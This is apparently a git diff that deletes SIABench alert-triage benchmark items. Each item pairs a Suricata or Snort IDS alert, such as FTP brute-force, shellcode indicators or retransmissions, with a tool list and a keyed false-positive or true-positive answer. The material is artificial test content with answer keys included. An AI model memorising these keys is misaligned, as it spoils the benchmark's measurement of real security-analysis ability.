to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236144.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236144.json deleted file mode 100644 index f335e94ab3e973e354995d3aa743065420bbb658..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236144.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236144", - "alert_type": "False", - "alert_name": "dp_236144" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:42.468203+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:42.468203+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236145.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236145.json deleted file mode 100644 index f96df0f05e1749dc7ff6b1bfe1b795ea62ae1411..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236145.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236145", - "alert_type": "False", - "alert_name": "dp_236145" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:45.838628+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:45.838628+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236146.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236146.json deleted file mode 100644 index 9a28eafb2354351a00c50b54a4730bd71d7275c5..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236146.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236146", - "alert_type": "False", - "alert_name": "dp_236146" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:45.847162+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:45.847162+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236147.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236147.json deleted file mode 100644 index 10e3e23cdd8eeaa597f9f19384e3ec93c91b9225..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236147.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236147", - "alert_type": "False", - "alert_name": "dp_236147" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:57:23.548893+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:57:23.548893+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236148.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236148.json deleted file mode 100644 index f6b93dd3f0b16ca379c36cf3106e38fa3f0e00ba..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236148.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236148", - "alert_type": "False", - "alert_name": "dp_236148" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:57:43.898562+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:57:43.898562+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236149.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236149.json deleted file mode 100644 index 31a4aaa3bd2a2862825e5a6cee6057370aa25a32..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236149.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236149", - "alert_type": "False", - "alert_name": "dp_236149" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:57:43.905585+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:57:43.905585+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236182.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236182.json deleted file mode 100644 index 2ddd98810d1072493740a16a02643599dd8fb5d8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236182.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236182", - "alert_type": "False", - "alert_name": "dp_236182" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:46:32.572458+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:34398 -> 192.168.1.70:8080", - "alert": "1970-01-01T00:46:32.572458+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:34398 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236234.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236234.json deleted file mode 100644 index 4e73c3522d9cb2a561650abe0d9c6bd5e5efce3f..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236234.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236234", - "alert_type": "False", - "alert_name": "dp_236234" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-23:45:07.107938 \"INDICATOR-SHELLCODE x86 setgid 0\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:51716", - "alert": "01/01-23:45:07.107938 \"INDICATOR-SHELLCODE x86 setgid 0\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:51716", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236256.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236256.json deleted file mode 100644 index 8a106ca35748bf511ccb75bf84c02ecc4eb5ceac..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236256.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236256", - "alert_type": "False", - "alert_name": "dp_236256" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-23:49:00.420684 \"INDICATOR-SHELLCODE x86 NOOP\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:57910", - "alert": "01/01-23:49:00.420684 \"INDICATOR-SHELLCODE x86 NOOP\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:57910", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236269.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236269.json deleted file mode 100644 index e9c02a3baf3951c25cae662dc3b1599bd05c3748..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236269.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236269", - "alert_type": "False", - "alert_name": "dp_236269" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T23:50:53.423656+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:40694", - "alert": "1970-01-01T23:50:53.423656+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:40694", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00080.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00080.json deleted file mode 100644 index 0f92ff299b3ebc42b8be9edff81204f9e7f357be..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00080.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00080", - "alert_type": "True", - "alert_name": "dp_00080" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-04:12:40.376827 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:39922", - "alert": "01/01-04:12:40.376827 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:39922", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00152.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00152.json deleted file mode 100644 index f17d33706a3a9c6bf5cb563dc5ee12835463e6fd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00152.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00152", - "alert_type": "True", - "alert_name": "dp_00152" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T04:12:40.424282+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:39922", - "alert": "1970-01-01T04:12:40.424282+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:39922", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00153.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00153.json deleted file mode 100644 index bd0913dbd14088b8d513c7f4939301d6029205be..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00153.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00153", - "alert_type": "True", - "alert_name": "dp_00153" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T04:14:39.750744+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:53882", - "alert": "1970-01-01T04:14:39.750744+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:53882", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00195.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00195.json deleted file mode 100644 index 71babd40dfa03606922b31c4f47e3ccb3c02bba7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00195.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00195", - "alert_type": "True", - "alert_name": "dp_00195" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-04:27:42.255992 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:59748", - "alert": "01/01-04:27:42.255992 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:59748", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00214.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00214.json deleted file mode 100644 index ca1709aaa6afb2fc8132de486c0c2e2c0cec0aeb..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00214.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00214", - "alert_type": "True", - "alert_name": "dp_00214" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-05:41:32.117058 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:40844", - "alert": "01/02-05:41:32.117058 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:40844", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00240.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00240.json deleted file mode 100644 index 3703e593bfe86276b2864a988cbd8f6626aff2b5..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00240.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00240", - "alert_type": "True", - "alert_name": "dp_00240" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T05:42:34.465726+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:50574", - "alert": "1970-01-02T05:42:34.465726+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:50574", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00266.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00266.json deleted file mode 100644 index d8c21a730e8a944311312b96c0699aa6082c546a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00266.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00266", - "alert_type": "True", - "alert_name": "dp_00266" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-05:51:52.799411 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:40904", - "alert": "01/02-05:51:52.799411 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:40904", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00370.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00370.json deleted file mode 100644 index d66841f768d381d1a104d848afa35090022344ee..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00370.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00370", - "alert_type": "True", - "alert_name": "dp_00370" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-06:03:59.232796 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:52078", - "alert": "01/02-06:03:59.232796 \"PROTOCOL-FTP Bad login\" {TCP} 192.168.1.90:21 -> 192.168.1.70:52078", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00387.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00387.json deleted file mode 100644 index 917dfe954557a9e31a3db6909a1ab45eee37e69b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00387.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00387", - "alert_type": "True", - "alert_name": "dp_00387" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T05:59:57.116848+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:51172", - "alert": "1970-01-02T05:59:57.116848+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:51172", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00390.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00390.json deleted file mode 100644 index 442080417eee52bc37982cc3dd2a1a9ae0870360..0000000000000000000000000000000000000000 --- 